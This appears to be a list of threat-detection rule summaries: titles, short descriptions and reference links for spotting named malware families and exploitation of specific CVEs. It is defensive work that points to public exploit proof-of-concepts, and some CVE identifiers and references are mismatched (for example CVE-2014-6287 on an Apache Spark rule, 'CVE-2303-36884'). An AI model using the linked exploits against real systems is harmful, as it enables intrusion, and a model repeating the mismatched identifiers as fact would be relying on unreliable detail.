Goofy Guineapig Backdoor Service Creation Detects service creation persistence used by the Goofy Guineapig backdoor https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Moriya Rootkit File Created Detects the creation of a file named "MoriyaStreamWatchmen.sys" in a specific location. This filename was reported to be related to the Moriya rootkit as described in the securelist's Operation TunnelSnake report. https://securelist.com/operation-tunnelsnake-and-moriya-rootkit/101831
Pingback Backdoor File Indicators Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2 as described in the Trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Pingback Backdoor DLL Loading Activity Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2 as described in the Trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Pingback Backdoor Activity Detects the use of the Pingback backdoor, which creates an ICMP tunnel for C2 as described in the Trustwave report https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/backdoor-at-the-end-of-the-icmp-tunnel, https://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406
Small Sieve Malware File Indicator Creation Detects filename indicators that contain a specific typo seen used by the Small Sieve malware. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Small Sieve Malware CommandLine Indicator Detects specific command line argument being passed to a binary as seen being used by the malware Small Sieve. https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
Small Sieve Malware Potential C2 Communication Detects potential C2 communication related to Small Sieve malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/goofy-guineapig/NCSC-MAR-Goofy-Guineapig.pdf
Small Sieve Malware Registry Persistence Detects registry value with specific intentional typo and strings seen used by the Small Sieve malware https://www.ncsc.gov.uk/static-assets/documents/malware-analysis-reports/small-sieve/NCSC-MAR-Small-Sieve.pdf
HAFNIUM Exchange Exploitation Activity Detects activity observed by different researchers to be HAFNIUM group activity (or related) on Exchange servers https://blog.truesec.com/2021/03/07/exchange-zero-day-proxylogon-and-hafnium/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/, https://discuss.elastic.co/t/detection-and-response-for-hafnium-activity/266289/3, https://twitter.com/GadixCRK/status/1369313704869834753?s=20, https://twitter.com/BleepinComputer/status/1372218235949617161
Exchange Exploitation Used by HAFNIUM Detects exploitation attempts in Exchange server logs as described in blog posts reporting on HAFNIUM group activity https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/, https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/
REvil Kaseya Incident Malware Patterns Detects process command line patterns and locations used by REvil group in Kaseya incident (can also match on other malware) https://community.sophos.com/b/security-blog/posts/active-ransomware-attack-on-kaseya-customers, https://www.joesandbox.com/analysis/443736/0/html, https://doublepulsar.com/kaseya-supply-chain-attack-delivers-mass-ransomware-event-to-us-companies-76e4ec6ec64b, https://therecord.media/revil-ransomware-executes-supply-chain-attack-via-malicious-kaseya-update/, https://blog.truesec.com/2021/07/04/kaseya-supply-chain-attack-targeting-msps-to-deliver-revil-ransomware/
APT PRIVATELOG Image Load Pattern Detects an image load pattern as seen when a tool named PRIVATELOG is used and rarely observed under legitimate circumstances https://web.archive.org/web/20210901184449/https://www.fireeye.com/blog/threat-research/2021/09/unknown-actor-using-clfs-log-files-for-stealth.html
SOURGUM Actor Behaviours Suspicious behaviours related to an actor tracked by Microsoft as SOURGUM https://www.virustotal.com/gui/file/c299063e3eae8ddc15839767e83b9808fd43418dc5a1af7e4f44b97ba53fbd3d/detection, https://github.com/Azure/Azure-Sentinel/blob/43e9be273dca321295190bfc4902858e009d4a35/Detections/MultipleDataSources/SOURGUM_IOC.yaml, https://www.microsoft.com/security/blog/2021/07/15/protecting-customers-from-a-private-sector-offensive-actor-using-0-day-exploits-and-devilstongue-malware/
DEWMODE Webshell Access Detects access to DEWMODE webshell as described in FIREEYE report https://www.mandiant.com/resources/blog/accellion-fta-exploited-for-data-theft-and-extortion
Potential CVE-2023-21554 QueueJumper Exploitation Detects potential exploitation of CVE-2023-21554 (dubbed QueueJumper) https://research.checkpoint.com/2023/queuejumper-critical-unauthorized-rce-vulnerability-in-msmq-service/
Potential CVE-2022-21587 Exploitation Attempt Detects potential exploitation attempts of CVE-2022-21587 an arbitrary file upload vulnerability impacting Oracle E-Business Suite (EBS). CVE-2022-21587 can lead to unauthenticated remote code execution. https://www.rapid7.com/blog/post/2023/02/07/etr-cve-2022-21587-rapid7-observed-exploitation-of-oracle-e-business-suite-vulnerability/, https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis, https://github.com/hieuminhnv/CVE-2022-21587-POC, https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/
Potential CVE-2022-22954 Exploitation Attempt - VMware Workspace ONE Access Remote Code Execution Detects potential exploitation attempts of CVE-2022-22954, a remote code execution vulnerability in VMware Workspace ONE Access and Identity Manager. As reported by Morphisec, as part of the attack chain, threat actors used PowerShell commands that executed as child processes of the legitimate Tomcat "prunsrv.exe" process application. https://blog.morphisec.com/vmware-identity-manager-attack-backdoor, https://github.com/DrorDvash/CVE-2022-22954_VMware_PoC
CVE-2022-24527 Microsoft Connected Cache LPE Detects files created during the local privilege exploitation of CVE-2022-24527 Microsoft Connected Cache https://www.rapid7.com/blog/post/2022/04/12/cve-2022-24527-microsoft-connected-cache-local-privilege-escalation-fixed/
Potential CVE-2022-26809 Exploitation Attempt Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-26809, https://www.bleepingcomputer.com/startups/RpcSs.exe-14544.html, https://twitter.com/cyb3rops/status/1514217991034097664, https://www.securonix.com/blog/cve-2022-26809-remote-procedure-call-runtime-remote-code-execution-vulnerability-and-coverage/
Zimbra Collaboration Suite Email Server Unauthenticated RCE Detects an attempt to leverage the vulnerable servlet "mboximport" for an unauthenticated remote command injection https://www.volexity.com/blog/2022/08/10/mass-exploitation-of-unauthenticated-zimbra-rce-cve-2022-27925/, https://www.yang99.top/index.php/archives/82/, https://github.com/vnhacker1337/CVE-2022-27925-PoC
Potential CVE-2022-29072 Exploitation Attempt Detects potential exploitation attempts of CVE-2022-29072, a 7-Zip privilege escalation and command execution vulnerability. 7-Zip version 21.07 and earlier on Windows allows privilege escalation (CVE-2022-29072) and command execution when a file with the .7z extension is dragged to the Help>Contents area. This is caused by misconfiguration of 7z.dll and a heap overflow. The command runs in a child process under the 7zFM.exe process. https://github.com/kagancapar/CVE-2022-29072, https://twitter.com/kagancapar/status/1515219358234161153
CVE-2022-31659 VMware Workspace ONE Access RCE Detects possible exploitation of VMware Workspace ONE Access Admin Remote Code Execution vulnerability as described in CVE-2022-31659 https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
Suspicious Set Value of MSDT in Registry (CVE-2022-30190) Detects set value ms-msdt MSProtocol URI scheme in Registry that could be an attempt to exploit CVE-2022-30190. https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190, https://msrc-blog.microsoft.com/2022/05/30/guidance-for-cve-2022-30190-microsoft-support-diagnostic-tool-vulnerability/
CVE-2022-31656 VMware Workspace ONE Access Auth Bypass Detects the exploitation of the VMware Workspace ONE Access Authentication Bypass vulnerability as described in CVE-2022-31656. VMware Workspace ONE Access, Identity Manager and vRealize Automation contain an authentication bypass vulnerability affecting local domain users. A malicious actor with network access to the UI may be able to obtain administrative access without the need to authenticate. https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd
Apache Spark Shell Command Injection - Weblogs Detects attempts to exploit an Apache Spark server via CVE-2014-6287 from a weblogs perspective https://github.com/W01fh4cker/cve-2022-33891/blob/fd973b56e78bca8822caa3a2e3cf1b5aff5d0950/cve_2022_33891_poc.py, https://sumsec.me/2022/CVE-2022-33891%20Apache%20Spark%20shell%20command%20injection.html, https://github.com/apache/spark/pull/36315/files
Atlassian Bitbucket Command Injection Via Archive API Detects attempts to exploit the Atlassian Bitbucket Command Injection CVE-2022-36804 https://twitter.com/_0xf4n9x_/status/1572052954538192901, https://www.rapid7.com/blog/post/2022/09/20/cve-2022-36804-easily-exploitable-vulnerability-in-atlassian-bitbucket-server-and-data-center/, https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html, https://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/
Potential OWASSRF Exploitation Attempt - Proxy Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
OWASSRF Exploitation Attempt Using Public POC - Proxy Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using the publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
Potential OWASSRF Exploitation Attempt - Webserver Detects exploitation attempts of the OWASSRF variant targeting Exchange servers. It uses the OWA endpoint to access the PowerShell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/
OWASSRF Exploitation Attempt Using Public POC - Webserver Detects exploitation attempts of the OWASSRF variant targeting Exchange servers using the publicly available POC. It uses the OWA endpoint to access the PowerShell backend endpoint https://www.crowdstrike.com/blog/owassrf-exploit-analysis-and-recommendations/, https://www.rapid7.com/blog/post/2022/12/21/cve-2022-41080-cve-2022-41082-rapid7-observed-exploitation-of-owassrf-in-exchange-for-rce/, https://twitter.com/purp1ew0lf/status/1602989967776808961?s=12&t=OkZJl_ViICeiftVEsohRyw
Suspicious Sysmon as Execution Parent Detects suspicious process executions in which Sysmon itself is the parent of a process, which could be a sign of exploitation (e.g. CVE-2022-41120) https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-41120, https://twitter.com/filip_dragovic/status/1590052248260055041, https://twitter.com/filip_dragovic/status/1590104354727436290
Exploitation Indicator Of CVE-2022-42475 Detects exploitation indicators of CVE-2022-42475, a heap-based buffer overflow in sslvpnd. https://www.fortiguard.com/psirt/FG-IR-22-398, https://www.bleepingcomputer.com/news/security/fortinet-says-ssl-vpn-pre-auth-rce-bug-is-exploited-in-attacks/, https://www.deepwatch.com/labs/customer-advisory-fortios-ssl-vpn-vulnerability-cve-2022-42475-exploited-in-the-wild/, https://community.fortinet.com/t5/FortiGate/Technical-Tip-Critical-vulnerability-Protect-against-heap-based/ta-p/239420
Potential Centos Web Panel Exploitation Attempt - CVE-2022-44877 Detects potential exploitation attempts that target the Centos Web Panel 7 Unauthenticated Remote Code Execution CVE-2022-44877 https://seclists.org/fulldisclosure/2023/Jan/1, https://www.rapid7.com/blog/post/2023/01/19/etr-exploitation-of-control-web-panel-cve-2022-44877/
Potential CVE-2022-46169 Exploitation Attempt Detects potential exploitation attempts that target the Cacti Command Injection CVE-2022-46169 https://github.com/0xf4n9x/CVE-2022-46169, https://github.com/Cacti/cacti/security/advisories/GHSA-6p93-p743-35gf, https://github.com/rapid7/metasploit-framework/pull/17407
MSSQL Extended Stored Procedure Backdoor Maggie Detects the execution of the extended stored procedure backdoor named Maggie in the context of Microsoft SQL Server. https://medium.com/@DCSO_CyTec/mssql-meet-maggie-898773df3b01
BlueSky Ransomware Artefacts Detects access to files and shares with names and extensions used by BlueSky ransomware, which could indicate a current or previous encryption attempt. https://unit42.paloaltonetworks.com/bluesky-ransomware/
Potential Bumblebee Remote Thread Creation Detects remote thread injection events based on actions seen used by Bumblebee. https://thedfirreport.com/2022/09/26/bumblebee-round-two/
ChromeLoader Malware Execution Detects execution of ChromeLoader malware via a registered scheduled task https://github.com/xephora/Threat-Remediation-Scripts/tree/main/Threat-Track/CS_INSTALLER, https://twitter.com/th3_protoCOL/status/1480621526764322817, https://twitter.com/Kostastsale/status/1480716528421011458, https://www.virustotal.com/gui/file/ded20df574b843aaa3c8e977c2040e1498ae17c12924a19868df5b12dee6dfdd
Emotet Loader Execution Via .LNK File Detects the Emotet Epoch4 loader as reported by @malware_traffic back in 2022. The ".lnk" file was delivered via phishing campaign. https://web.archive.org/web/20220422215221/https://twitter.com/malware_traffic/status/1517622327000846338, https://twitter.com/Cryptolaemus1/status/1517634855940632576, https://tria.ge/220422-1pw1pscfdl/, https://tria.ge/220422-1nnmyagdf2/
Hermetic Wiper TG Process Patterns Detects process execution patterns found in intrusions related to the Hermetic Wiper malware attacks against Ukraine in February 2022 https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ukraine-wiper-malware-russia
Raspberry Robin Subsequent Execution of Commands Detects the subsequent execution of commands by Raspberry Robin. https://redcanary.com/blog/raspberry-robin/
Raspberry Robin Initial Execution From External Drive Detects the initial execution of the Raspberry Robin malware from an external drive using "Cmd.EXE". https://redcanary.com/blog/raspberry-robin/
Serpent Backdoor Payload Execution Via Scheduled Task Detects the post-exploitation execution technique of the Serpent backdoor. According to Proofpoint, one of the commands the backdoor ran was executed via a temporary scheduled task created using an unusual method: it creates a fictitious Windows event and a trigger so that, once the event is created, the payload is executed. https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain
Potential Raspberry Robin Dot Ending File Detects a command line containing a reference to a file ending with a ".". This scheme has been seen used by Raspberry Robin. https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/
Potential ACTINIUM Persistence Activity Detects specific process parameters as used by ACTINIUM scheduled task persistence creation. https://www.microsoft.com/security/blog/2022/02/04/actinium-targets-ukrainian-organizations
FakeUpdates/SocGholish Activity Detects initial execution of FakeUpdates/SocGholish malware via wscript that later executes commands via cmd or powershell. https://twitter.com/th3_protoCOL/status/1536788652889497600, https://twitter.com/1ZRR4H/status/1537501582727778304
MERCURY APT Activity Detects suspicious command line patterns seen being used by MERCURY APT https://www.microsoft.com/security/blog/2022/08/25/mercury-leveraging-log4j-2-vulnerabilities-in-unpatched-systems-to-target-israeli-organizations/
MSMQ Corrupted Packet Encountered Detects corrupted packets sent to the MSMQ service. Could potentially be a sign of CVE-2023-21554 exploitation https://www.randori.com/blog/vulnerability-analysis-queuejumper-cve-2023-21554/
CVE-2023-1389 Potential Exploitation Attempt - Unauthenticated Command Injection In TP-Link Archer AX21 Detects potential exploitation attempt of CVE-2023-1389 an Unauthenticated Command Injection in TP-Link Archer AX21. https://www.tenable.com/security/research/tra-2023-11, https://github.com/Voyag3r-Security/CVE-2023-1389/blob/4ecada7335b17bf543c0e33b2c9fb6b6215c09ae/archer-rev-shell.py, https://www.zerodayinitiative.com/blog/2023/4/21/tp-link-wan-side-vulnerability-cve-2023-1389-added-to-the-mirai-botnet-arsenal
Exploitation Indicators Of CVE-2023-20198 Detects exploitation indicators of CVE-2023-20198, a privilege escalation vulnerability in the Cisco IOS XE Software Web UI. https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-iosxe-webui-privesc-j22SaA4z, https://www.thestack.technology/security-experts-call-for-incident-response-exercises-after-mass-cisco-device-exploitation/
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Linux) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Suspicious Confluence Child Process (Windows) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Proxy) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
CVE-2023-22518 Exploitation Attempt - Vulnerable Endpoint Connection (Webserver) Detects exploitation attempt of CVE-2023-22518 (Confluence Data Center / Confluence Server), where an attacker can exploit vulnerable endpoints to e.g. create admin accounts and execute arbitrary commands. https://confluence.atlassian.com/security/cve-2023-22518-improper-authorization-vulnerability-in-confluence-data-center-and-server-1311473907.html, https://www.huntress.com/blog/confluence-to-cerber-exploitation-of-cve-2023-22518-for-ransomware-deployment, https://github.com/ForceFledgling/CVE-2023-22518
Potential CVE-2023-2283 Exploitation Detects a potential exploitation attempt of CVE-2023-2283, an authentication bypass in libSSH. The exploitation method causes an error message stating that keys for curve25519 could not be generated. This error message is a sign of an exploitation attempt, not of a successful exploitation. https://twitter.com/kevin_backhouse/status/1666459308941357056?s=20, https://git.libssh.org/projects/libssh.git/tree/src/curve25519.c#n420, https://nvd.nist.gov/vuln/detail/CVE-2023-2283, https://www.blumira.com/cve-2023-2283/, https://github.com/github/securitylab/tree/1786eaae7f90d87ce633c46bbaa0691d2f9bf449/SecurityExploits/libssh/pubkey-auth-bypass-CVE-2023-2283
Outlook Task/Note Reminder Received Detects changes to Outlook-related registry values that indicate a reminder was triggered for a Note or Task item. This could be a sign of exploitation of CVE-2023-23397. Further investigation is required to determine whether the exploitation succeeded. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
CVE-2023-23397 Exploitation Attempt Detects Outlook initiating a connection to a WebDAV or SMB share, which could be a sign of CVE-2023-23397 exploitation. https://www.trustedsec.com/blog/critical-outlook-vulnerability-in-depth-technical-analysis-and-recommendations-cve-2023-23397/
Potential CVE-2023-23397 Exploitation Attempt - SMB Detects (failed) outbound connection attempts to internet facing SMB servers. This could be a sign of potential exploitation attempts of CVE-2023-23397. https://www.microsoft.com/en-us/security/blog/2023/03/24/guidance-for-investigating-attacks-using-cve-2023-23397/
Potential CVE-2023-23752 Exploitation Attempt Detects a potential exploitation attempt of CVE-2023-23752, an improper access check in web service endpoints in Joomla. https://xz.aliyun.com/t/12175, https://twitter.com/momika233/status/1626464189261942786
Potential CVE-2023-25157 Exploitation Attempt Detects a potential exploitation attempt of CVE-2023-25157, a SQL injection in GeoServer. https://github.com/win3zz/CVE-2023-25157, https://twitter.com/parzel2/status/1665726454489915395, https://github.com/advisories/GHSA-7g5f-wrx8-5ccf
Potential CVE-2023-25717 Exploitation Attempt Detects a potential exploitation attempt of CVE-2023-25717, a remote code execution via an unauthenticated HTTP GET request in Ruckus Wireless Admin. https://cybir.com/2023/cve/proof-of-concept-ruckus-wireless-admin-10-4-unauthenticated-remote-code-execution-csrf-ssrf/
Potential CVE-2023-27363 Exploitation - HTA File Creation By FoxitPDFReader Detects suspicious ".hta" file creation in the startup folder by Foxit Reader. This can be an indication of CVE-2023-27363 exploitation. https://github.com/j00sean/SecBugs/tree/ff72d553f75d93e1a0652830c0f74a71b3f19c46/CVEs/CVE-2023-27363, https://www.zerodayinitiative.com/advisories/ZDI-23-491/, https://www.tarlogic.com/blog/cve-2023-27363-foxit-reader/
Potential CVE-2023-27997 Exploitation Indicators Detects indicators of potential exploitation of CVE-2023-27997 in Fortigate web logs. To avoid false positives, it is best to look for successive requests to the endpoints mentioned as well as unusual values of the "enc" parameter. https://blog.lexfo.fr/Forensics-xortigate-notice.html, https://blog.lexfo.fr/xortigate-cve-2023-27997.html, https://research.kudelskisecurity.com/2023/06/12/cve-2023-27997-fortigate-ssl-vpn/, https://labs.watchtowr.com/xortigate-or-cve-2023-27997/
Potential MOVEit Transfer CVE-2023-34362 Exploitation - File Activity Detects file indicators of potential exploitation of MOVEit CVE-2023-34362. https://www.bleepingcomputer.com/news/security/new-moveit-transfer-zero-day-mass-exploited-in-data-theft-attacks/, https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.rapid7.com/blog/post/2023/06/01/rapid7-observed-exploitation-of-critical-moveit-transfer-vulnerability/, https://www.reddit.com/r/sysadmin/comments/13wxuej/comment/jmhdg55/
Potential MOVEit Transfer CVE-2023-34362 Exploitation - Dynamic Compilation Via Csc.EXE Detects the execution of "csc.exe" via the "w3wp.exe" process. MOVEit-affected hosts execute "csc.exe" via the "w3wp.exe" process to dynamically compile malicious DLL files. MOVEit is affected by a critical vulnerability; exploited hosts show evidence of dynamically compiling a DLL and writing it under C:\\Windows\\Microsoft\.NET\\Framework64\\v4\.0\.30319\\Temporary ASP\.NET Files\\root\\([a-z0-9]{5,12})\\([a-z0-9]{5,12})\\App_Web_[a-z0-9]{5,12}\.dll. Hunting opportunity: events from IIS dynamically compiling binaries via csc.exe on behalf of the MOVEit application, especially since May 27th, should be investigated. https://www.huntress.com/blog/moveit-transfer-critical-vulnerability-rapid-response, https://www.trustedsec.com/blog/critical-vulnerability-in-progress-moveit-transfer-technical-analysis-and-recommendations/
MOVEit CVE-2023-34362 Exploitation Attempt - Potential Web Shell Request Detects get requests to specific files used during the exploitation of MOVEit CVE-2023-34362 https://community.progress.com/s/article/MOVEit-Transfer-Critical-Vulnerability-31May2023, https://www.mandiant.com/resources/blog/zero-day-moveit-data-theft
Potential CVE-2023-36874 Exploitation - Uncommon Report.Wer Location Detects the creation of a "Report.wer" file in an uncommon folder structure. This could be a sign of potential exploitation of CVE-2023-36874. https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36874 Exploitation - Fake Wermgr.Exe Creation Detects the creation of a file named "wermgr.exe" in an uncommon directory. This could be a sign of potential exploitation of CVE-2023-36874. https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36874 Exploitation - Fake Wermgr Execution Detects the execution of a renamed "cmd", "powershell" or "powershell_ise" binary. Attackers were seen using these binaries in a renamed form as "wermgr.exe" in exploitation of CVE-2023-36874 https://github.com/Wh04m1001/CVE-2023-36874, https://www.crowdstrike.com/blog/falcon-complete-zero-day-exploit-cve-2023-36874/
Potential CVE-2023-36884 Exploitation Dropped File Detects a specific file being created in the recent folder of Office. These files have been seen being dropped during potential exploitations of CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit, https://twitter.com/wdormann/status/1679184475677130755, https://twitter.com/r00tbsd/status/1679042071477338114/photo/1
Potential CVE-2023-36884 Exploitation Pattern Detects a unique pattern seen being used by RomCom potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2303-36884 URL Request Pattern Traffic Detects a specific URL pattern containing a specific extension and parameters pointing to an IP address. This pattern was seen being used by RomCom potentially exploiting CVE-2023-36884. https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - File Downloads Detects files seen being requested by RomCom while potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - URL Marker Detects a unique URL marker seen being used by RomCom potentially exploiting CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
Potential CVE-2023-36884 Exploitation - Share Access Detects access to a file share with a naming schema seen being used during exploitation of CVE-2023-36884 https://blogs.blackberry.com/en/2023/07/romcom-targets-ukraine-nato-membership-talks-at-nato-summit
CVE-2023-38331 Exploitation Attempt - Suspicious Double Extension File Detects the creation of a file with a double extension and a space by WinRAR. This could be a sign of exploitation of CVE-2023-38331 https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
CVE-2023-40477 Potential Exploitation - .REV File Creation Detects the creation of ".rev" files by WinRAR. Could be indicative of potential exploitation of CVE-2023-40477. Look for a suspicious execution shortly after creation or a WinRAR application crash. https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html
CVE-2023-38331 Exploitation Attempt - Suspicious WinRAR Child Process Detects exploitation attempt of CVE-2023-38331 (WinRAR before v6.23), where an attacker can leverage WinRAR to execute arbitrary commands and binaries. https://www.group-ib.com/blog/cve-2023-38831-winrar-zero-day/, https://github.com/knight0x07/WinRAR-Code-Execution-Vulnerability-CVE-2023-38831/blob/26ab6c40b6d2c09bb4fc60feaa4a3a90cfd20c23/Part-1-Overview.md
CVE-2023-40477 Potential Exploitation - WinRAR Application Crash Detects a crash of "WinRAR.exe" where the version is lower than 6.23. This could indicate potential exploitation of CVE-2023-40477 https://wildptr.io/winrar-cve-2023-40477-poc-new-vulnerability-winrar-security-research/, https://github.com/wildptr-io/Winrar-CVE-2023-40477-POC, https://www.rarlab.com/vuln_rev3_names.html
Potential Information Disclosure CVE-2023-43261 Exploitation - Proxy Detects exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components, in proxy logs. https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261
Potential Information Disclosure CVE-2023-43261 Exploitation - Web Detects exploitation attempts of CVE-2023-43261, an information disclosure in Milesight UR5X, UR32L, UR32, UR35 and UR41 before v35.3.0.7 that allows attackers to access sensitive router components, in access logs. https://thehackernews.com/2023/10/experts-warn-of-severe-flaws-affecting.html, https://medium.com/@win3zz/inside-the-router-how-i-accessed-industrial-routers-and-reported-the-flaws-29c34213dfdf, https://github.com/win3zz/CVE-2023-43261, https://vulncheck.com/blog/real-world-cve-2023-43261
Potential CVE-2023-46214 Exploitation Attempt Detects potential exploitation of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104
Exploitation Attempt Of CVE-2023-46214 Using Public POC Code Detects exploitation attempt of CVE-2023-46214, a remote code execution (RCE) in Splunk Enterprise through insecure XML parsing using known public proof of concept code https://github.com/nathan31337/Splunk-RCE-poc/, https://blog.hrncirik.net/cve-2023-46214-analysis, https://advisory.splunk.com/advisories/SVD-2023-1104
CVE-2023-46747 Exploitation Activity - Proxy Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP. https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
CVE-2023-46747 Exploitation Activity - Webserver Detects exploitation activity of CVE-2023-46747, an unauthenticated remote code execution vulnerability in F5 BIG-IP. https://github.com/AliBrTab/CVE-2023-46747-POC/tree/main, https://github.com/0xorOne/nuclei-templates/blob/2fef4270ec6e5573d0a1732cb18bcfc4b1580a88/http/cves/2023/CVE-2023-46747.yaml, https://mp.weixin.qq.com/s/wUoBy7ZiqJL2CUOMC-8Wdg, https://www.praetorian.com/blog/refresh-compromising-f5-big-ip-with-request-smuggling-cve-2023-46747/
